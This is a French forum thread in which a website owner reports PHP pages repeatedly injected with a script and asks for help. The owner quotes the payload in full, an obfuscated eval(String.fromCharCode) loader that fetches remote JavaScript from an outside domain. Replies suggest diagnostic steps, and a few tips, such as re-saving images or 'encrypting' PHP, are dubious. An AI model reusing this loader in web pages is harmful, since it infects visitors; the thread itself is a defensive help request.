piratage site

Bonjour,

J'ai un problème sur mon site.

Régulèrement, mes pages php sont modifiées et une une balise est rajoutée commandant le téléchargement d'un fichier heureusement bloqué par mon AV.

Voici ce qui est ajouté :
<kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5><script>eval(String.from CharCode102,117,110,99,116,105,111,110,32,108,106,115,40,41,123,116,114,121,123,118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,
114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,115,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,115,114,99,34,44,34,104,116,116,112,58,47,47,115,97,101,103,104,105,101,98,101,101,115,105,111,103,111,104,46,105,110,58,51,49,50,57,47,106,115,34,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,125,99,97,116,99,104,40,101,41,123,125,125,115,101,116,84,105,109,101,111,117,116,40,34,108,106,115,40,41,34,44,53,48,48,41,59));</script></kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5>

Mon hébergeur me dit que cela viendrait d'un script, mais j'ai tout vérifié et je ne trouve rien.

Pouvez-vous m'aider?

Merci de cette réponse.

Mon site ne propose pas de upload.

Pour l'instant je n'ai que des pages php et images (png, jpg et gif)
Aucun script que du html en .php

Comment vérifier les images ?

Tu peux peut etre les reprendre sur un logiciel d'édition d'image par exemple Gimp ou ToShop..
Les ouvrir, faire une modif et les sauvegarder.
Mais c'est qu'une idée..
S.

Salut,

Ca peut venir de pas mal d'endroit à mon avis et il y a des chances que tu n'y puisses rien : contamination du serveur de ton hébergeur par exemple. Sa réponse est un peu limite d'ailleurs

J'imagine que tu l'as déjà trouvé, mais tu es victime de ça

Tu devrais dans un premier temps écrire qq lignes JS pour désactiver ce malware, ce qui devrait être possible, du style supprimer le script ayant une src à http://saeghiebeesiogoh.in:3129/js

Ce que je ferais ensuite serait de créer une simple page index.html vide. Tu l'appelles, tu jettes un oeil dans le code HTML reçu :
- non présence du script => c'est à ton hébergeur de gérer, sauf peut être si tu es sur un serveur dédié.
- présence du script
=> tu supprimes toutes tes autres pages, scripts, images, etc ... (en les sauvegardant évidemment) et tu ne conserves que le index.html vide.
Tu t'assures qu'il n'y a pas le code avant de l'envoyer sur le ftp.
Tu le charges sur le ftp, puis le re charges à partir de celui ci.
présence du script => c'est à ton hébergeur de gérer
Tu appelles index.html dans ton browser :
non présence du script => c'est à ton hébergeur de gérer car il y a de très grandes chances que cela vienne d'une infection du serveur.


Cordialement,


Kohntark -

Arf :

Non, ça peut toujours venir d'ailleurs, continue sur le point suivant.

Et tiens nous au courant.

Cordialement,

Kohntark -

Est ce que ton code est bien crypté??
Le problème peut venir de la car si on peut y accédez on peut le pirater facilement^^. C'est là l'avantage mais aussi l'inconvéniant de PHP => très/trop souple.